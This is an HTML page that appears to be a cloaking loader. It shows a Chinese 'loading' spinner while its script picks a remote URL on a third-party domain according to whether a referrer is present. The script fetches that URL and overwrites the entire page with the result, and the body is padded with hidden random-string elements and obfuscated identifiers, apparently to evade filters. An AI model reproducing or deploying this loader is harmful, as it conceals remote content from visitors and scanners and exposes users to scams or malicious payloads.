<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Xu4dsO {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Xu4dsO .j1WnUh {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Xu4dsO .content {
            line-height: 50px;
            text-align: center
        }

        .Xu4dsO .img {
            width: 100%
        }

        .Xu4dsO .PrN6yM0RKO {
            text-align: center
        }

        .Xu4dsO .PrN6yM0RKO span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Xu4dsO .PrN6yM0RKO span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Xu4dsO .PrN6yM0RKO span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Xu4dsO .PrN6yM0RKO span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Xu4dsO .PrN6yM0RKO span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Xu4dsO .PrN6yM0RKO span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Xu4dsO .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function eFyhzoQsP(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var L0Rqfs7 = eFyhzoQsP('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ L0Rqfs7 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ L0Rqfs7 +".html?a=share";
		}
		
        zzPtgclL=url+"#"+new Date().getTime();
        zzPtgclL && function() {
            $.get(zzPtgclL, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >pampUVVOaQVABbOIE8lNaYlnwuq85H5gpSe3v7KQtfyfyIu6T7fuBjWuaxap9tMiWKQIF3DMhxzsL9oTQuc8RZbbi7ITJHcpPRIP</li>
<span style='display:none'>h4c89jfq6MjyZbSIP0JWzzOv</span>
<b style='display:none' >PYhSmzwwP9llsmP7Ixl1bUt6i</b>
<a  href='#' style='display:none'>zrtuCv8IPY5bh2iLb24gQp9pP7nuT0fCGSewABme</a>
<p  style='display:none'>vFQjVRKFJlTmTFW639rgm9R5Szsntm6</p>
<p  style='display:none'>vFQjVRKFJlTmTFW639rgm9R5Szsntm6</p>
<a  href='#' style='display:none'>zrtuCv8IPY5bh2iLb24gQp9pP7nuT0fCGSewABme</a>
<a  href='#' style='display:none'>zrtuCv8IPY5bh2iLb24gQp9pP7nuT0fCGSewABme</a>
<ul style='display:none' >oWiQuS2Q6UXaFO0NsIj01uXRK5HZSNfu4tGA2hYIlUNeIJ3sTNfOZQCinBNcYz8UPJ6LnBCAzasv9872fHS</ul>
<p  style='display:none'>vFQjVRKFJlTmTFW639rgm9R5Szsntm6</p><div class="Xu4dsO">
    <div class="j1WnUh">
        <div class="PrN6yM0RKO">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >vQoSu9HTuovYvMeS7PYctsuGSgw5DSllZQPz1q1Pxe</ul>
<ul style='display:none' >vQoSu9HTuovYvMeS7PYctsuGSgw5DSllZQPz1q1Pxe</ul>
<img  src='' style='display:none'></body>
</html>